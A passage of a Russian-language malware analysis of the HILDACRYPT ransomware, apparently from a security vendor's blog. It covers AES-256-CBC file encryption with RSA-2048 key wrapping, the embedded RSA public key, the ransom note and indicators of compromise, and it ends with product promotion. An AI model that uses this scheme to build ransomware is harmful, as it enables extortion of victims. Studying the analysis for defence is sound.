Для ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ Ρ„Π°ΠΉΠ»ΠΎΠ² ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ Π°Π»Π³ΠΎΡ€ΠΈΡ‚ΠΌ AES-256-CBC. Π Π°Π·ΠΌΠ΅Ρ€ ΠΊΠ»ΡŽΡ‡Π° составляСт 256 Π±ΠΈΡ‚, Π° Ρ€Π°Π·ΠΌΠ΅Ρ€ Π²Π΅ΠΊΡ‚ΠΎΡ€Π° ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ (IV) β€” 16 Π±Π°ΠΉΡ‚.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

На ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΌ снимкС экрана значСния byte_2 ΠΈ byte_1 Π±Ρ‹Π»ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Ρ‹ случайным ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ GetBytes().

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

ΠšΠ»ΡŽΡ‡

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π’Π˜

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π—Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ» ΠΈΠΌΠ΅Π΅Ρ‚ Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΠ΅ HCY!.. Π­Ρ‚ΠΎ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°. Для этого Ρ„Π°ΠΉΠ»Π° Π±Ρ‹Π»ΠΈ созданы ΠΊΠ»ΡŽΡ‡ ΠΈ IV, упомянутыС Π²Ρ‹ΡˆΠ΅.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π¨ΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΊΠ»ΡŽΡ‡Π΅ΠΉ

ΠšΡ€ΠΈΠΏΡ‚ΠΎΠ»ΠΎΠΊΠ΅Ρ€ сохраняСт сгСнСрированный ΠΊΠ»ΡŽΡ‡ AES Π² Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠΌ Ρ„Π°ΠΉΠ»Π΅. ΠŸΠ΅Ρ€Π²Π°Ρ Ρ‡Π°ΡΡ‚ΡŒ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π° ΠΈΠΌΠ΅Π΅Ρ‚ Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΎΠΊ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ содСрТит Ρ‚Π°ΠΊΠΈΠ΅ Π΄Π°Π½Π½Ρ‹Π΅ ΠΊΠ°ΠΊ HILDACRYPT, KEY, IV, FileLen Π² Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅ XML, ΠΈ выглядит ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ:

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π¨ΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΊΠ»ΡŽΡ‡Π° AES ΠΈ IV происходит с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ RSA-2048, Π° ΠΊΠΎΠ΄ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ β€” с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Base64. ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ RSA хранится Π² Ρ‚Π΅Π»Π΅ ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ»ΠΎΠΊΠ΅Ρ€Π° Π² ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… строк Π² Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅ XML.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

Для ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ ΠΊΠ»ΡŽΡ‡Π° AES-Ρ„Π°ΠΉΠ»Π° ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ RSA. ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ RSA Π·Π°ΠΊΠΎΠ΄ΠΈΡ€ΠΎΠ²Π°Π½ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Base64 ΠΈ состоит ΠΈΠ· модуля ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΎΠΉ экспонСнты 65537. Для Π΄Π΅ΡˆΠΈΡ„Ρ€ΠΎΠ²ΠΊΠΈ трСбуСтся Π·Π°ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ RSA-ΠΊΠ»ΡŽΡ‡, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π΅ΡΡ‚ΡŒ Ρƒ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°.

ПослС RSA-ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ ΠΊΠ»ΡŽΡ‡ AES кодируСтся с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Base64, сохранСнного Π² Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠΌ Ρ„Π°ΠΉΠ»Π΅.

Π‘ΠΎΠΎΠ±Ρ‰Π΅Π½ΠΈΠ΅ ΠΎ Π²Ρ‹ΠΊΡƒΠΏΠ΅

По ΠΎΠΊΠΎΠ½Ρ‡Π°Π½ΠΈΠΈ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ HILDACRYPT записываСт html-Ρ„Π°ΠΉΠ» Π² Ρ‚Ρƒ ΠΏΠ°ΠΏΠΊΡƒ, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ ΠΎΠ½ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π» Ρ„Π°ΠΉΠ»Ρ‹. Π£Π²Π΅Π΄ΠΎΠΌΠ»Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹-вымогатСля содСрТит Π΄Π²Π° адрСса элСктронной ΠΏΠΎΡ‡Ρ‚Ρ‹, ΠΏΠΎ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ ΠΆΠ΅Ρ€Ρ‚Π²Π° ΠΌΠΎΠΆΠ΅Ρ‚ ΡΠ²ΡΠ·Π°Ρ‚ΡŒΡΡ со Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠΌ.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π’Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΎΠ΅ ΡƒΠ²Π΅Π΄ΠΎΠΌΠ»Π΅Π½ΠΈΠ΅ содСрТит Ρ‚Π°ΠΊΠΆΠ΅ строчку Β«No loli is safe;)Β» β€” «Ни ΠΎΠ΄Π½Π° Π»ΠΎΠ»ΠΈ Π½Π΅ находится Π² бСзопасности;)Β», β€” отсылка ΠΊ Π·Π°ΠΏΡ€Π΅Ρ‰Π΅Π½Π½Ρ‹ΠΌ Π² Π―ΠΏΠΎΠ½ΠΈΠΈ пСрсонаТам Π°Π½ΠΈΠΌΠ΅ ΠΈ ΠΌΠ°Π½Π³ΠΈ со Π²Π½Π΅ΡˆΠ½ΠΎΡΡ‚ΡŒΡŽ ΠΌΠ°Π»Π΅Π½ΡŒΠΊΠΈΡ… Π΄Π΅Π²ΠΎΡ‡Π΅ΠΊ.

Π’Ρ‹Π²ΠΎΠ΄

HILDACRYPT, Π½ΠΎΠ²ΠΎΠ΅ сСмСйство ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»Π΅ΠΉ, выпустило Π½ΠΎΠ²ΡƒΡŽ Π²Π΅Ρ€ΡΠΈΡŽ. МодСль ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ Π½Π΅ позволяСт ΠΆΠ΅Ρ€Ρ‚Π²Π΅ Π΄Π΅ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Ρ‚ΡŒ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠΎΠΉ-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»Π΅ΠΌ Ρ„Π°ΠΉΠ»Ρ‹. ΠšΡ€ΠΈΠΏΡ‚ΠΎΠ»ΠΎΠΊΠ΅Ρ€ΠΎΠΌ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ ΠΌΠ΅Ρ‚ΠΎΠ΄Ρ‹ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΠΉ Π·Π°Ρ‰ΠΈΡ‚Ρ‹ для ΠΎΡ‚ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ слуТб Π·Π°Ρ‰ΠΈΡ‚Ρ‹, относящихся ΠΊ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ. Автор HILDACRYPT β€” ΠΏΠΎΠΊΠ»ΠΎΠ½Π½ΠΈΠΊ дСмонстрируСмого Ρ‡Π΅Ρ€Π΅Π· Netflix ΠΌΡƒΠ»ΡŒΡ‚ΡΠ΅Ρ€ΠΈΠ°Π»Π° Hilda, ссылка Π½Π° Ρ‚Ρ€Π΅ΠΉΠ»Π΅Ρ€ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΡΠΎΠ΄Π΅Ρ€ΠΆΠ°Π»Π°ΡΡŒ Π² письмС ΠΎ Π²Ρ‹ΠΊΡƒΠΏΠ΅ ΠΏΡ€Π΅Π΄Ρ‹Π΄ΡƒΡ‰Π΅ΠΉ вСрсии ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹.

Как ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ, Acronis Backup ΠΈ Acronis True Image ΠΌΠΎΠ³ΡƒΡ‚ Π·Π°Ρ‰ΠΈΡ‚ΠΈΡ‚ΡŒ ваш ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ ΠΎΡ‚ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹-вымогатСля HILDACRYPT, Π° ΠΏΡ€ΠΎΠ²Π°ΠΉΠ΄Π΅Ρ€Ρ‹ ΠΈΠΌΠ΅ΡŽΡ‚ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ Π·Π°Ρ‰ΠΈΡ‚ΠΈΡ‚ΡŒ своих ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΎΠ² с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Acronis Backup Cloud. Π—Π°Ρ‰ΠΈΡ‚Π° обСспСчиваСтся благодаря Ρ‚ΠΎΠΌΡƒ, Ρ‡Ρ‚ΠΎ Π² состав этих Ρ€Π΅ΡˆΠ΅Π½ΠΈΠΉ кибСрбСзопасности Π²Ρ…ΠΎΠ΄ΠΈΡ‚ Π½Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ΅ ΠΊΠΎΠΏΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅, Π½ΠΎ ΠΈ наша интСгрированная систСма Π·Π°Ρ‰ΠΈΡ‚Ρ‹ Acronis Active Protection β€” усилСнная модСлью машинного обучСния ΠΈ основанная Π½Π° повСдСнчСских эвристиках тСхнология, которая, ΠΊΠ°ΠΊ никакая другая, способна ΠΏΡ€ΠΎΡ‚ΠΈΠ²ΠΎΡΡ‚ΠΎΡΡ‚ΡŒ ΡƒΠ³Ρ€ΠΎΠ·Π°ΠΌ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»Π΅ΠΉ Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня.

Π˜Π½Π΄ΠΈΠΊΠ°Ρ‚ΠΎΡ€Ρ‹ ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚Π°Ρ†ΠΈΠΈ

Π Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΠ΅ Ρ„Π°ΠΉΠ»Π° HCY!
HILDACRYPTReadMe.html
xamp.exe с ΠΎΠ΄Π½ΠΎΠΉ Π±ΡƒΠΊΠ²ΠΎΠΉ Β«pΒ» ΠΈ Π±Π΅Π· Ρ†ΠΈΡ„Ρ€ΠΎΠ²ΠΎΠΉ подписи
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: habr.com